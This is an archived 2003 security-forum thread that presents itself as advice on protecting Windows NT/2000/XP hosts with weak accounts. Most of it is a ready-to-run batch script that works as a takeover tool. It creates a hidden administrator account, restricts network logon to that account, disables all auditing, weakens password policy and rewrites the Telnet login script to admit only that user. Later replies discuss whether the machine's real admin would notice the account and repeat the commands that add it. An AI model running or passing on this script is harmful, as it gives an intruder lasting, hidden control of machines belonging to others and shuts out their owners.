Securing A Host Against Ntpass Attack

Full Version: Securing A Host Against Ntpass Attack

GovernmentSecurity.org > System Security > System Hardening

=k3Rn=

Sep 18 2003, 07:54 AM

hi !

i want to write a short batch file to secure host taht have weak nt accounts.
up to now i found the following registry keys, to turn off remote registry access and the automated admin shares.

in the bacth u would first kill the shares (c$-x$, ipc$, admin$)
and then add the reg keys

HKEY_LOCAL_MACHINE --> System --> CurrentControlSet --> Services --> LanmanServer --> Parameters

die 2 Reg_Dword´s "AutoShareServer" und "AutoShareWks" set to zero

and

echo REGEDIT4 >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RemoteRegistry\] >> root.reg
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry

what else has to be done ?
does anyone got a bacth file to manage that ?

greeting
=k3Rn=

LiquidIce

Sep 28 2003, 01:45 AM

CODE

rem Blocks all netbios connections from all accounts except the one specified
rem secure.bat UserName Password *

@echo off
del temp
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp

net user /add %1 %2
net localgroup administrators %1 /add
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp

del %SystemRoot%\system32\login.cmd
echo @echo off >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem Default global login script for the Telnet Server >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem In the default setup, this command script is executed when the >> %SystemRoot%\system32\login.cmd
echo rem initial command shell is invoked. It, in turn, will try to invoke >> %SystemRoot%\system32\login.cmd
echo rem the individual user's login script. >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd

echo if %%USERNAME%%==%1 goto good >> %SystemRoot%\system32\login.cmd
echo exit >> %SystemRoot%\system32\login.cmd
echo :good >> %SystemRoot%\system32\login.cmd

echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd
echo echo Welcome to Microsoft Telnet Server. >> %SystemRoot%\system32\login.cmd
echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd

echo cd %%HOMEDRIVE%%%HOMEPATH%% /d >> %SystemRoot%\system32\login.cmd
del temp

del root.reg
echo REGEDIT4 >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RemoteRegistry\] >> root.reg
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry
del root.reg

=k3Rn=

Sep 28 2003, 02:58 AM

yea i know that batch file.
first question, does it only work on win2k systems or also on win xp?
and second, it creats a new admin account - won't the admin / user of the computer see that ?

hermel

Oct 14 2003, 08:00 AM

The batch file works on NT, W2K and XP.

You can add a new user with:

CODE

net user hermel myPW /add
net localgroup Administrators hermel /add

But the Admin can see that a new User with Adminrights is there.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.